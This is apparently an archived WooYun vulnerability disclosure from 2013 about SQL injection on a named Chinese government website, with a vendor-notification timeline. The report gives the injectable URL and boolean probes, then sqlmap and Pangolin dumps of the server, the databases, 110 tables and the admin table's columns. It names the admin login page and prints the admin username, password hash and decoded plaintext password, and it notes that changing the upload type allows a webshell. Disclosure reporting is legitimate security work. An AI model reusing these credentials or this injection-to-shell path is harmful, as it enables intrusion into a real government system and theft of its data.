乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-10-29: 细节已通知厂商并且等待厂商处理中 2013-11-02: 厂商已经确认,细节仅向厂商公开 2013-11-12: 细节向核心白帽子及相关领域专家公开 2013-11-22: 细节向普通白帽子公开 2013-12-02: 细节向实习白帽子公开 2013-12-13: 细节向公众公开
......................
sql配置失误当输入'时 http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922'的提示攻击政府网站违法,您的ip已记录在案,系统自动将攻击详细记录提交到网警部门!我们保留追究的权利!若输入 and 1=2 提示错误 '80020009'/web/content_hd.do,行 71http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922%20and%201=2当然了 http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922%20and%201=1是正常页面
sql注入
Target: http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922Host IP: 218.60.144.144Web Server: Microsoft-IIS/6.0Powered-by: ASP.NETDB Server: MSSQL 2005 with errorResp. Time(avg): 406 msCurrent User: jishengweiSql Version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)Current DB: jsw2010System User: jishengweiHost Name: JSWServer Name: JSW jsw2010Data Bases: master tempdb model msdb pubs Northwind jsw2010 count jsw2010Data Bases: master tempdb model msdb pubs Northwind jsw2010 countsqlmap 的解表available databases [8]:[*] count[*] jsw2010[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdbDatabase: jsw2010[110 tables]+---------------------------+| dbo.PE_AdZone || dbo.PE_Admin || dbo.PE_Advertisement || dbo.PE_Announce || dbo.PE_AreaCollection || dbo.PE_Article || dbo.PE_Article11 || dbo.PE_Author || dbo.PE_Bank || dbo.PE_BankrollItem || dbo.PE_Card || dbo.PE_Channel || dbo.PE_City || dbo.PE_Class || dbo.PE_Class11 || dbo.PE_Classroom || dbo.PE_Client || dbo.PE_Comment || dbo.PE_Company || dbo.PE_ComplainItem || dbo.PE_Config || dbo.PE_ConsumeLog || dbo.PE_Contacter || dbo.PE_CopyFrom || dbo.PE_Country || dbo.PE_DeliverCharge || dbo.PE_DeliverItem || dbo.PE_DeliverType || dbo.PE_Dictionary || dbo.PE_DownError || dbo.PE_DownServer || dbo.PE_Equipment || dbo.PE_Favorite || dbo.PE_Field || dbo.PE_Filters || dbo.PE_Friend || dbo.PE_FriendSite || dbo.PE_FsKind || dbo.PE_GuestBook || dbo.PE_GuestKind || dbo.PE_HistrolyNews || dbo.PE_HouseArea || dbo.PE_HouseCS || dbo.PE_HouseCZ || dbo.PE_HouseConfig || dbo.PE_HouseHZ || dbo.PE_HouseQG || dbo.PE_HouseQZ || dbo.PE_InfoS || dbo.PE_InvoiceItem || dbo.PE_Item || dbo.PE_JobCategory || dbo.PE_JsFile || dbo.PE_KeyLink || dbo.PE_Label || dbo.PE_Log || dbo.PE_MailChannel || dbo.PE_Message || dbo.PE_NewKeys || dbo.PE_OrderForm || dbo.PE_OrderFormItem || dbo.PE_Page || dbo.PE_PageClass || dbo.PE_PayPlatform || dbo.PE_Payment || dbo.PE_PaymentType || dbo.PE_Photo || dbo.PE_Position || dbo.PE_PositionSupplyInfo || dbo.PE_PresentProject || dbo.PE_Producer || dbo.PE_Product || dbo.PE_Province || dbo.PE_RechargeLog || dbo.PE_Resume || dbo.PE_ServiceItem || dbo.PE_ShoppingCarts || dbo.PE_Skin || dbo.PE_Soft || dbo.PE_Space || dbo.PE_SpaceBook || dbo.PE_SpaceComment || dbo.PE_SpaceDiary || dbo.PE_SpaceKind || dbo.PE_SpaceLink || dbo.PE_SpaceMusic || dbo.PE_SpacePhoto || dbo.PE_SpaceVisitor || dbo.PE_Special || dbo.PE_SubCompany || dbo.PE_Supply || dbo.PE_Supply_Company || dbo.PE_Survey || dbo.PE_SurveyAnswer || dbo.PE_SurveyInput || dbo.PE_SurveyQuestion || dbo.PE_Template || dbo.PE_TemplateProject || dbo.PE_Trademark || dbo.PE_TransferItem || dbo.PE_UsedDetail || dbo.PE_User || dbo.PE_UserGroup || dbo.PE_Vote || dbo.PE_WorkPlace || dbo.dtproperties || dbo.netservices || dbo.sysconstraints || dbo.syssegments || dbo.tongji |+---------------------------+Database: jsw2010Table: dbo.PE_Admin[31 columns]+------------------------+----------+| Column | Type |+------------------------+----------+| AdminName | bit || AdminPurview_Article | bit || AdminPurview_GuestBook | bit || AdminPurview_House | bit || AdminPurview_Job | bit || AdminPurview_Others | bit || AdminPurview_Photo | bit || AdminPurview_Shop | bit || AdminPurview_Soft | bit || AdminPurview_Supply | bit || arrClass_Check | bit || arrClass_GuestBook | bit || arrClass_House | bit || arrClass_Input | bit || arrClass_Manage | bit || arrClass_View | bit || Count_Add | bit || Count_Check | bit || Count_Reject | bit || EnableMultiLogin | bit || ID | datetime || LastLoginIP | datetime || LastLoginTime | datetime || LastLogoutTime | datetime || LoginTimes | int || Password | int || Purview | int || RndPassword | nvarchar || RoleName | nvarchar || topname | nvarchar || UserName | nvarchar |+------------------------+----------+pangolin的解表
后台被猜解http://www.lnrkjsw.gov.cn/admin/admin_login.asp
弱口令用户名:admin密码:f64793875b2204cf (通过解码得到明文密码 admin888888)
后台可入 并且可修改上传类型可getshell
危害等级:中
漏洞Rank:10
确认时间:2013-11-02 19:57
暂无